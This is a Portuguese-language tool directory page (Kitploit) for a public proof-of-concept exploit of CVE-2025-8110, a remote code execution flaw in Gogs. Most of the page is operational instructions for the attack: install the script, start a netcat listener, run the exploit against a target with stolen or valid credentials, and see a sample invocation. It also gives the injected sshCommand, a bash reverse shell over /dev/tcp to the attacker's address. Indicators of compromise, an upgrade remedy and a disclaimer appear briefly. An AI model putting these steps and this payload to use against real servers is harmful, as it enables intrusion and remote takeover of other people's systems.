Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8110 — PoC de RCE no Gogs - CVE-2025-8110 | Kitploit
Ferramentas/GitHubGitHub/x4brozer/cve-2025-8110
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

PoC de RCE no Gogs - CVE-2025-8110

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit RCE no Gogs (CVE-2025-8110)

Python License

Prova de Conceito para CVE-2025-8110 - Execução Remota de Código no Gogs via bypass de symlink e injeção de sshCommand.

Descrição

Este exploit abusa de um bypass de symlink na API do Gogs para sobrescrever .git/config e injetar um sshCommand malicioso que executa uma reverse shell.

Requisitos

  • Python 3.12+
  • Git instalado
  • Credenciais válidas do Gogs
  • Token da API do Gogs

Instalação

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Baixar ferramenta
ArgumentoDescrição
-u, --urlURL alvo do Gogs (ex., http://target:3000)
-U, --usernameNome de usuário do Gogs
-P, --passwordSenha do Gogs
-t, --tokenToken da API do Gogs
-lh, --hostSeu IP para reverse shell
-lp, --portSua porta para listener
-x, --proxyAtivar proxy (localhost:8080)

Uso

Passo 1: Obter token da API

Faça login no Gogs → Configurações → Aplicações → Gerar token

Passo 2: Iniciar listener

root@kitploit:~
nc -lvnp 4444

Passo 3: Executar exploit

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

Exemplo

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Como funciona

  • Cria repositório com symlink para .git/config
  • Usa a API PutContents para escrever no symlink
  • Injeta sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
  • Gogs executa comando → reverse shell

Solução de Problemas

ProblemaSolução
Falha no loginVerifique usuário/senha
Falha na criação do repositórioRegere o token da API
Tempo limite de leituraNormal - verifique listener
Sem shellVerifique firewall, tente porta diferente

Indicadores de Comprometimento

  • Nomes de repositório aleatórios de 8 caracteres
  • Symlink malicious_link em repositórios
  • sshCommand em .git/config

Remediação

Atualize para Gogs v0.13.4 ou posterior:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Aviso Legal

Esta ferramenta é apenas para fins educacionais e testes autorizados. Acesso não autorizado é ilegal.

Créditos

  • Descoberta: Wiz Research
  • PoC Original: zAbuQasem
  • Exploit: X4BROZER